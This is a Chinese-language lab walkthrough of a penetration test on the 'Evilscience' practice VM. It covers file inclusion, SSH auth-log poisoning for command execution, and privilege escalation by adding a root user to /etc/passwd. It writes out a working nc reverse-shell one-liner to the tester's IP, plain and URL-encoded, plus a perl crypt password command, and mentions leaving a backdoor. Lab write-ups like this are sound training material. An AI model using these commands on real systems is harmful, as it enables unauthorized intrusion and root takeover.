Evilscience 渗透测试

Evilscience渗透测试

0x00实验环境

靶机：Evilscience，IP地址：192.168.8.147

测试机：Kali，IP地址：192.168.8.145；

0x01实验流程

信息收集——主机发现、端口扫描

渗透测试

0x02实验步骤

1. 主机发现

1. 端口及服务扫描

1. 探测web端

在url中发现疑似文件包含

 

扫描web目录

1. 尝试文件包含，BP抓包

**文件包含目录

发现的确存在文件包含

可以看到/var/log/auth.log保存的是ssh的登录记录

尝试ssh反弹shell被auth.log记录保存

查看记录是否被写入

尝试加入命令执行

1. 设置反弹shell

mknod backpipe p && nc 192.168.8.145 4444 0<backpipe | /bin/bash 1>backpip

mknod+backpipe+p+%26%26+nc+192.168.8.145+4444+0%3cbackpipe+%7c+%2fbin%2fbash+1%3ebackpipe

PS:

>获取反弹shell

mknod backpipe p && nc 测试机IP 监听端口 0<backpipe | /bin/bash 1>backpipe

 

url编码——>

 

mknod+backpipe+p+%26%26+nc+测试机IP+监听端口+0%3cbackpipe+%7c+%2fbin%2fbash+1%3ebackpipe

由于环境原因，所以重新安装靶机，ip改变192.168.8.148

成功getshell

1. 提权

发现是ubuntu16.04的系统版本

查看该用户的root权限命令

尝试运行该脚本

可以发现它是以root权限运行的

尝试向/etc/passwd中加入一个用户

设置一个密码并加盐值

perl -le 'print crypt("fuck","addedsalt")'

ady6w7OPdeVHI

   

    添加用户

 

尝试切换用户

提权成功

1. 清理痕迹，留后门

 

 

总结：

1. 首先发现有文件包含，但是普通的文件包含无法显示数据，用文件包含的字典**出有效文件目录
2. 发现是ssh的连接日志，故意以ssh一句话@ip连接该目标主机，让其被日志文件记录
3. 尝试文件包含并添加命令，发现可以执行，继而添加反弹shell脚本或者直接用msfvenom生成反弹shell并用包含命令下载赋权执行，kali监听，都可以getshell
4. Get shell以后首先素质三连，切换交互式终端，查看当前用户可以使用的root权限命令，然后根据系统版本漏洞或者命令权限漏洞提权如向/etc/passwd写入一个root权限用户以提权
5. 加盐值的命令如下

perl -le 'print crypt("密码","addedsalt")'